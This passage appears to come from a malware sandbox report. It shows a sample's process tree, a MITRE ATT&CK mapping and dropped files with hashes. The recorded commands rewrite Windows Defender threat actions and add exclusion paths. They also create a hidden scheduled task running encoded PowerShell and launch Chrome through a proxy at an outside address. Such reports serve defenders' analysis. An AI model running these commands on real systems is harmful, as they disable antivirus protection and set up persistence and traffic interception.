REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
2⤵
PID:5856

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
3⤵
PID:5676

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
4⤵
PID:5956

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
3⤵
PID:5732

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
3⤵
PID:6088

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
3⤵
PID:6040

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
3⤵
PID:6080

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
3⤵
PID:5680

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
3⤵
PID:1984

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
3⤵
PID:860

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
3⤵
PID:3132

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
3⤵
PID:2372

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
3⤵
PID:5552

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
3⤵
PID:5068

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
3⤵
PID:4484

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
3⤵
PID:5332

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
3⤵
PID:5412

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
3⤵
PID:5444

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
3⤵
PID:2716

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
3⤵
PID:5720

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
3⤵
PID:1652

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
3⤵
PID:4896

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
3⤵
PID:1700

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
3⤵
PID:4536

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
3⤵
PID:5236

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
3⤵
PID:6004

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
3⤵
PID:4080

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
3⤵
PID:5348

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
3⤵
PID:5560

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
3⤵
PID:4920

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BcCQMXwjU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BcCQMXwjU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ITFcQRBGgRUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ITFcQRBGgRUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SwHdQyPSnQdU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SwHdQyPSnQdU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mfOEuGwqkLFbC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mfOEuGwqkLFbC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xRoHTrfYcfGreqCFIqR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xRoHTrfYcfGreqCFIqR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\UakFvFPMbXVAWgVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\UakFvFPMbXVAWgVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\IvFVVHNigIyhAiWaa\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\IvFVVHNigIyhAiWaa\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\QomKEDtaZauBMonw\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\QomKEDtaZauBMonw\" /t REG_DWORD /d 0 /reg:64;"
2⤵
PID:1812

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BcCQMXwjU" /t REG_DWORD /d 0 /reg:32
3⤵
PID:3104

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BcCQMXwjU" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1320

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BcCQMXwjU" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1652

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ITFcQRBGgRUn" /t REG_DWORD /d 0 /reg:32
3⤵
PID:5796

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ITFcQRBGgRUn" /t REG_DWORD /d 0 /reg:64
3⤵
PID:5900

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SwHdQyPSnQdU2" /t REG_DWORD /d 0 /reg:32
3⤵
PID:5424

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SwHdQyPSnQdU2" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2920

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mfOEuGwqkLFbC" /t REG_DWORD /d 0 /reg:32
3⤵
PID:5308

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mfOEuGwqkLFbC" /t REG_DWORD /d 0 /reg:64
3⤵
PID:5288

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xRoHTrfYcfGreqCFIqR" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1220

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xRoHTrfYcfGreqCFIqR" /t REG_DWORD /d 0 /reg:64
3⤵
PID:8

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\UakFvFPMbXVAWgVB /t REG_DWORD /d 0 /reg:32
3⤵
PID:2544

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\UakFvFPMbXVAWgVB /t REG_DWORD /d 0 /reg:64
3⤵
PID:5380

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1880

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
3⤵
PID:3740

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\IvFVVHNigIyhAiWaa /t REG_DWORD /d 0 /reg:32
3⤵
PID:5412

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\IvFVVHNigIyhAiWaa /t REG_DWORD /d 0 /reg:64
3⤵
PID:1968

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\QomKEDtaZauBMonw /t REG_DWORD /d 0 /reg:32
3⤵
PID:4460

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\QomKEDtaZauBMonw /t REG_DWORD /d 0 /reg:64
3⤵
PID:5348

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gYlJXdVNC" /SC once /ST 15:55:06 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
2⤵
- Creates scheduled task(s)
PID:4372

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gYlJXdVNC"
2⤵
PID:6040

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --proxy-server="94.103.91.33:3333"
1⤵
PID:5144

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ff878c79758,0x7ff878c79768,0x7ff878c79778
2⤵
PID:2752

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1576 --field-trial-handle=2572,i,1909944897307204147,12796951519748104669,131072 /prefetch:2
2⤵
PID:5864

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --proxy-server=94.103.91.33:3333 --mojo-platform-channel-handle=1812 --field-trial-handle=2572,i,1909944897307204147,12796951519748104669,131072 /prefetch:8
2⤵
PID:5436

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --proxy-server=94.103.91.33:3333 --mojo-platform-channel-handle=1844 --field-trial-handle=2572,i,1909944897307204147,12796951519748104669,131072 /prefetch:8
2⤵
PID:5696

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2384 --field-trial-handle=2572,i,1909944897307204147,12796951519748104669,131072 /prefetch:1
2⤵
PID:5500

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2392 --field-trial-handle=2572,i,1909944897307204147,12796951519748104669,131072 /prefetch:1
2⤵
PID:5452

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3820 --field-trial-handle=2572,i,1909944897307204147,12796951519748104669,131072 /prefetch:1
2⤵
PID:3860

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --proxy-server=94.103.91.33:3333 --mojo-platform-channel-handle=4204 --field-trial-handle=2572,i,1909944897307204147,12796951519748104669,131072 /prefetch:8
2⤵
PID:404

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=4316 --field-trial-handle=2572,i,1909944897307204147,12796951519748104669,131072 /prefetch:1
2⤵
PID:4568

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --proxy-server=94.103.91.33:3333 --mojo-platform-channel-handle=3632 --field-trial-handle=2572,i,1909944897307204147,12796951519748104669,131072 /prefetch:8
2⤵
PID:4508

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --proxy-server=94.103.91.33:3333 --mojo-platform-channel-handle=4240 --field-trial-handle=2572,i,1909944897307204147,12796951519748104669,131072 /prefetch:8
2⤵
PID:2808

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:2168

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:1140

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Exfiltration

Command and Control

Web Service

T1102

Impact

Service Stop

T1489

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Are.docx
Filesize
11KB

MD5
a33e5b189842c5867f46566bdbf7a095

SHA1
e1c06359f6a76da90d19e8fd95e79c832edb3196

SHA256
5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454

SHA512
f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

Download Submit
C:\ProgramData\ECBGIEHDBAAFIDGDAAAAAAAAKE
Filesize
5.0MB

MD5
e41d7898882dc34aa98dd2c57dc430a0

SHA1
912faa47bdae0a6f06320e149f6aefc0b1a3d0c8

SHA256
c7f8534518e7b9512d12ad62a415de2c009adbebe41ef5cde7fa3e6c531a4b2e

SHA512
da3fe364606d79bd2751e6aef8b8e8171ce36df5bc0d44bf1004990d66e2f69ab5669e61949d35bdc59b63996c373d0f1ae069df0772ba7e4f4b7096eb29757e

Download Submit
C:\ProgramData\HJDBKJKFIECAAAKFBFBF
Filesize
46KB

MD5
02d2c46697e3714e49f46b680b9a6b83

SHA1
84f98b56d49f01e9b6b76a4e21accf64fd319140

SHA256
522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9

SHA512
60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

Download Submit
C:\ProgramData\mozglue.dll
Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize
1KB

MD5
3c6a98dff2c8e5d41183fb934602bccf

SHA1
389eea4f6c8b9a19dd6efd65b2c979feeb4262a7

SHA256
8c5e90026091280487ae42d5c0f266528cacb6de18c7f3d693ecfdb547b06ac8

SHA512
fde8e5de812641dc896e8d8182dcf4244670e431f3310aba576f0f330a9d8a4221eb7513005e9755512d0c645cbf164c4c5f8872689d2e52a58b3f39668de8fd

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize
410B

MD5
8e243555779e54fdae91f0d54f18c514

SHA1
0c2055ad5e45543cec550788d5238ef0180d96f9

SHA256
d3eaefb2846ae6014639eaa4c4cae982318a3f9e063a7f4ca62803d23f5d44f4

SHA512
019b79c1039334fd2f60f294c94fbadec9110d669c79e766b5055f41a8846c3bd02bab7d0d9b698c28f7aae71f0255f0be6bfcea42d29a75ab5dc1c495c25bb1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
Filesize
40B

MD5
c64929d71f8769929406b672778db163

SHA1
9dcbf05f8029ec6263ec43b6958a54626adb62d1

SHA256
b8d3e55babd999d4d2ada4cdae8d09b2b34321266395960c07ec811d08b91a0a

SHA512
9ce6eaea812713c9dc9de55875f5899b21b34e2fd09666590f0a4b3a4c6b3dcce382c5c1e73e01f4066c4b99024cda816ddb324701deabf2756c76e6f5977332

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ejjnniijcjakoaghpedjpcfkoclplenf\3.0_0\128.png
Filesize
28KB

MD5
f47a2fc416a8e5b5a89df402c45f1c35

SHA1
7e57689f339b017c964a7ccfc44f823f664452fa

SHA256
718b06abad15580ef39b01d703e7a8cf7ef00379fcabd16f77803ba14f0628df

SHA512
